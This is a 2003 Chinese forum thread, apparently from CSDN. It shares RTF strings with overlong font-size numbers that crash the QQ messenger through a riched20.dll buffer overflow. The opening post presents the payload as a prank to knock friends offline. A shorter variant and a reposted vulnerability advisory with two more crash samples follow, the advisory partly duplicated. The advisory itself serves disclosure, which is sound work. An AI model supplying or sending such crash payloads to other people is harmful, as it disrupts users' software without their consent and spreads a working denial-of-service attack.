9,506
社区成员
发帖
与我相关
我的任务
分享使QQ掉线的一句文本~~~~
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\fcharset134 'cb'ce'cc'e5;}}
\fs1800000000000000000000000000000
只要把上面的内容发给你的朋友,他就会掉线呵呵
\fs1800000000000000000000000000000
只要把上面的内容发给你的朋友,他就会掉线呵呵
...全文
请发表友善的回复…
发表回复
PinkEye 2003-05-06
- 打赏
- 举报
就是利用超大字的漏洞,可以用写字板直接生成上面代码.
yangsixian 2003-05-06
- 打赏
- 举报
没反应我
试了 啊
试了 啊
二进制空间安全 2003-05-06
- 打赏
- 举报
早知道了!~~
原理是:
riched20.dll中存在一个缓冲区溢出漏洞,该漏洞可导致使用此DLL模块相应功能的应用程序崩溃,但其很难被用来执行任意代码。
问题出现在其对RTF文档分析的代码中,其对文档中属性标示中的数字(如字体大小)等处理不当,使其出现溢出。
此溢出似乎不能导致执行任意代码。
下面一段RTF文档可能导致非法操作:
{.............省略}
viewkind4uc1pardcf1kerning2f0fs181211111111111111111111111111111111
10000www.yoursft.comfs20par
}
其中 fs 是用来设置后面的文字 byebye 的字体大小的,当字体大小数字串长度超过32字节时,就会引发缓冲区溢出,当超过34字节以后就有可能会导致应用程序崩溃。
原理是:
riched20.dll中存在一个缓冲区溢出漏洞,该漏洞可导致使用此DLL模块相应功能的应用程序崩溃,但其很难被用来执行任意代码。
问题出现在其对RTF文档分析的代码中,其对文档中属性标示中的数字(如字体大小)等处理不当,使其出现溢出。
此溢出似乎不能导致执行任意代码。
下面一段RTF文档可能导致非法操作:
{.............省略}
viewkind4uc1pardcf1kerning2f0fs181211111111111111111111111111111111
10000www.yoursft.comfs20par
}
其中 fs 是用来设置后面的文字 byebye 的字体大小的,当字体大小数字串长度超过32字节时,就会引发缓冲区溢出,当超过34字节以后就有可能会导致应用程序崩溃。
ke1 2003-05-06
- 打赏
- 举报
原理是什么?
404page 2003-05-05
- 打赏
- 举报
不错,值得研究
snewxf 2003-05-05
- 打赏
- 举报
真的假的。
xblack 2003-02-19
- 打赏
- 举报
小强
cybxm 2003-02-19
- 打赏
- 举报
最新版本的qq没反应!
blue_rat 2003-02-19
- 打赏
- 举报
似乎不用那么多,以下这些就可以了:)
{\rtf\f1800000000000000000000000000000
{\rtf\f1800000000000000000000000000000
hope1983 2003-02-19
- 打赏
- 举报
呵呵,我试过了!
结果被MM骂发了我一顿,还要跟我绝交
结果被MM骂发了我一顿,还要跟我绝交
cybxm 2003-02-19
- 打赏
- 举报
发给别人了怎么没反应啊??
ImHow 2003-02-19
- 打赏
- 举报
Security Defence Stdio 漏洞公告[001]
Riched20.DLL 属性标示缓冲区溢出漏洞
网址: http:\\www.yoursft.com
发现人:Thrkdev
发现日期:2003年2月1日
公布日期:2003年2月14日
受影响系统: Microsoft Windows 98
Microsoft Windows 2000
Microsoft Windows XP
该漏洞可能还存在于其它操作系统中,未测试
EMAIL: Thkrdev@yoursft.com
------------------------------------
漏洞描述:
riched20.dll中存在一个缓冲区溢出漏洞,该漏洞可导致使用此DLL模块相应功能的应用程序崩溃,但其很难被用来执行任意代码。
问题出现在其对RTF文档分析的代码中,其对文档中属性标示中的数字(如字体大小)等处理不当,使其出现溢出。
此溢出似乎不能导致执行任意代码。
下面一段RTF文档可能导致非法操作:
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0\fs18121111111111111111111111111111111110000 www.yoursft.com\fs20\par
}
其中 \fs 是用来设置后面的文字 byebye 的字体大小的,当字体大小数字串长度超过32字节时,就会引发缓冲区溢出,当超过34字节以后就有可能会导致应用程序崩溃。
不但是\fs的设置中会出现这个问题,其他属性标示中的类似情况下也会出现同样的问题,例如下面一段RTL文档,同样会导致非法操作:
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0121111111111111111111111111111111112222\fs180 www.yoursft.com\fs20\par
}
更为可怕的是,目前很多软件包括国内最流行的既时通讯软件QQ(QQ2000c 0825 版本以后)都会受此漏洞影响,对方可以给你发送一个包含利用漏洞的
攻击消息,那你的QQ在查看对方的消息时会立即崩溃。
Riched20.DLL 属性标示缓冲区溢出漏洞
网址: http:\\www.yoursft.com
发现人:Thrkdev
发现日期:2003年2月1日
公布日期:2003年2月14日
受影响系统: Microsoft Windows 98
Microsoft Windows 2000
Microsoft Windows XP
该漏洞可能还存在于其它操作系统中,未测试
EMAIL: Thkrdev@yoursft.com
------------------------------------
漏洞描述:
riched20.dll中存在一个缓冲区溢出漏洞,该漏洞可导致使用此DLL模块相应功能的应用程序崩溃,但其很难被用来执行任意代码。
问题出现在其对RTF文档分析的代码中,其对文档中属性标示中的数字(如字体大小)等处理不当,使其出现溢出。
此溢出似乎不能导致执行任意代码。
下面一段RTF文档可能导致非法操作:
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0\fs18121111111111111111111111111111111110000 www.yoursft.com\fs20\par
}
其中 \fs 是用来设置后面的文字 byebye 的字体大小的,当字体大小数字串长度超过32字节时,就会引发缓冲区溢出,当超过34字节以后就有可能会导致应用程序崩溃。
不但是\fs的设置中会出现这个问题,其他属性标示中的类似情况下也会出现同样的问题,例如下面一段RTL文档,同样会导致非法操作:
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0121111111111111111111111111111111112222\fs180 www.yoursft.com\fs20\par
}
更为可怕的是,目前很多软件包括国内最流行的既时通讯软件QQ(QQ2000c 0825 版本以后)都会受此漏洞影响,对方可以给你发送一个包含利用漏洞的
攻击消息,那你的QQ在查看对方的消息时会立即崩溃。
wangjiayan 2003-02-18
- 打赏
- 举报
原理??
huzhangyou 2003-02-18
- 打赏
- 举报
真的很奇怪
lmf2008 2003-02-18
- 打赏
- 举报
牛比~~~
Corporal 2003-02-18
- 打赏
- 举报
收到
alexsten 2003-02-18
- 打赏
- 举报
我试过了,可以的,让QQ发生错误,然后关闭。
我猜是利用RTF的buffer overflow,微软有报道过这个漏洞
但是没有找到对应的补丁
各位有什么办法吗?
我猜是利用RTF的buffer overflow,微软有报道过这个漏洞
但是没有找到对应的补丁
各位有什么办法吗?
happyjacksir 2003-02-18
- 打赏
- 举报
我試過了可以,它會讓QQ關閉.
原理呢?
原理呢?
zlc158 2003-02-18
- 打赏
- 举报
没道理
mprogramer 2003-02-18
- 打赏
- 举报
要新QQ才可以如果不行的话证明你QQ已经是老版的啦~~~
加载更多回复(2)
